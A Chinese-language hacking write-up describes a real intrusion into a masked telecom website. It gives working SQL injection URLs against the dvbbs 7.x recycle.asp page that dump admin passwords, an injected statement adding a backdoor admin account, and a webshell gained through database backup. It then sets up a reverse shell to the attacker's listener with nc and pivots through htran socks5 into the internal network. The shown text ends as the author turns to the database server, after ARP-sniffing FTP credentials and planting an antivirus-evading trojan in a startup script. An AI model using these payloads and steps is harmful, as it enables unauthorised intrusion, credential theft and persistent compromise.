一、踩点:
http://xxx.online.xx.xx XX电信的站点，这个站是我一直都想拿下的，首页存在注入点，是sa 登陆，数据库是放另一外网的主机，那台主机禁止对外连接，但是可以上网，对外不开放端口。
http://xxx.online.xx.xx/bbs为其论谈，是access dvbbs7.0 sp2.

二、拿下aspshell
动网前台提权的方法我就不多说了，jinsdb给的工具，很快就提完前台。不抓图，继续. 得到前台后就是对拿后台。动网recycle.asp过滤不严，导致注入漏洞的存在，先说一下,漏洞不是我发现的，构造注入点如下:
http://xxx.online.xx.xx/bbs/recycle.asp?tablename=Dv_bbs1 union select 1,2,l_content,4,5,6 from dv_log where l_id>0 union select 1,1,1,1,1,1 from dv_bbs1&page=7

这里要注意的是，这个漏洞的前提是以前台管理员身份登陆，对access和mssql的dvbbs 7.x通杀，通过上面的构造，就可以暴出l_content的内容。这里还要说的是，最后面的&page=7，通过上面的注入语句是暴出所有l_content的值，但是动网一个界面只能显示10多条，所以大家通过修改page的值来找l_content的内容，一般是在最后几个数字，这个page是回收站的页数，如果一共有130页，你一般从120开始，这样，通过121，122
,一直累注上去，直到找出password的明文，如果你懂点sql的话，当然也可以用来暴管理员的散列，只是变换一下注入语句而已，如:
http://xxx.online.xx.xx/bbs/recycle.asp?tablename=Dv_bbs1 union select 1,2,password,4,5,6 from dv_admin where password>0 union select 1,1,1,1,1,1 from dv_bbs1&page=7

利用上面的注射方式，可以暴出l_content的值，当然，如果你想暴dv_admin的话，只要构造一下注射语句就可以了。利用这种注册很快暴出前后台的账号和密码。

而对于sql方法更多，动网的其它文件也存在注入漏洞，如:先查看一下随便一个用户的资料，在最下面的奖惩处点一下，接着在操作理由里输入:
test ，没有对用户进行分值操作’,’127.0.0.1’,5) ;insert into dv_admin (username,[password],flag,adduser) values (’linzi123’,’7412b5da7be0cf42’,’1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37’,’linzi123’);--

这样在后台就加了一个linzi123的用户。进到后台后，sql的和access在备份的地方有些不同，偶给大家一个备份得shell的文件databack.htm.
打开他的源代码，找到语句
<form method="post" action="http://目标主机/ADMIN_data.asp?action=BackupData&act=Backup">
把目标主机换成你已经进入后台的url就可以了，如http://www.cnbct.org/bbs/,接下来就和access的一样了，方法我就不多说了。
当然你也可以利用backup a shell，在国内几个商业黑客站点里有文章介绍。但是要注意的是要看权限，public权限就别想的了，至少我是无法做到。

三、代理的妙用
思路:
得到aspshell后，从传统的思维模式从发，先拿下这台机子，然后再向内网渗透。但是通过踩点后发现，主机的安全性做的还可以，没什么可以利用的第三方补丁。提权，以自身的水平来说，还无法这现。通过踩点可以知道，目录限的很死，activeX禁创控件，虽然主机有用Serv-U，但是改了端口和默认的账号和密码，所以根本无法提权。这时的想法是，先利用jet exp得到一个可执行的shell，然后，利用这个shell把主机做成一个socks5肉鸡，通过反弹，本机也进入其内网，再接着，就是扫描嗅探出主机Serv-U的账号和密码，然后quote site exec执行命令.
实践过程:
1.本地执行:jet 1 222.222.222.222 520
其中222.222.222.222为本机的IP，520为听的端口.生成一个db1.mdb，
2.把它上传到xxx.online.xx.xx,利用老兵的数据库操作功能打开这个db1.mdb，当然用海阳2006的数据库操作功能也可以，只要可以打开就可以。
3.本机事先用nc执行nc -vv -l -p 520，很快就得到一个反弹的shell，这里说一下，反弹的权限是当前权限，当你用system admin打开db.mdb，返回的会是systemshell，而在aspshell下打开则返回了aspshell的权限。
4.得到shell后，再上传一个htran,新板的htran有个sock5反弹的功能。执行如下:
本机: htran -s -listen 670 6700
xxx.online.xx.xx的aspshell上执行:htran -s -connect 我的IP 670
5.本机再用sockcap连接我的IP的6700端口，自己就变成了在他的内网中，这里要说的是guest权限是可以实现socks5的转发，大家不必去担心权限不够。 sockscap连接后，挂上扫描器，这个时候你扫的就会是那个内网所在的机子了，偶挂上后扫到内网几台弱口令的机子。

四、向主机进军
得到内网的机子的system权限后，开了他的TS，并用htran转到了公网(详情见我做的动画，光备里有)。有了一个GUI界面，也就方便自己的渗透，开始驱动，准备arpsniffer，因为主机有ftp，且是serv-u,所以我选择了嗅探它的21端口。对于嗅探的内容，网上有很多人做成了动画，大家去国内的黑客站点搜索一下就有资料。但是有一点要说一下，有些朋友在嗅探时老是显示can’n spoof等等出错，我建议大家去小榕的官方去下载原板的，个人觉得是驱动问题，大家换旧的驱动，不要用新的，个人经验。
几天后，再登上内网的机子，查了一下嗅的文件，看到了漂亮的ftp密码，不过不是system权限，好在目录是c:，有写的权限，向启动写了一个批处理志，内容就是运行偶上传的马儿，这里的马，偶放了一个没公布的马，免杀嘛！几天后就看到反弹了。反弹后，偶先把它做成了sockscap 肉鸡,这个时候做成服务，方便以后进来。用sockscap加个服务器，主要是方面以后的渗透，做完后，用sockscap添加3389登陆器，然后连接127.0.0.1就看到了界面，

五、向最难的SQL进军
查看conn.asp文件后，可知mssql服务器的IP是另一公网主机，不过，这台主机很让人难过，因为那台主机做了IP限制，只对xxx.online.xx.xx开放1433端口，其它的主机碰都碰不到它，另外采用软硬结合的防火墙，禁止程序对外连接，还好可以上网。

标签：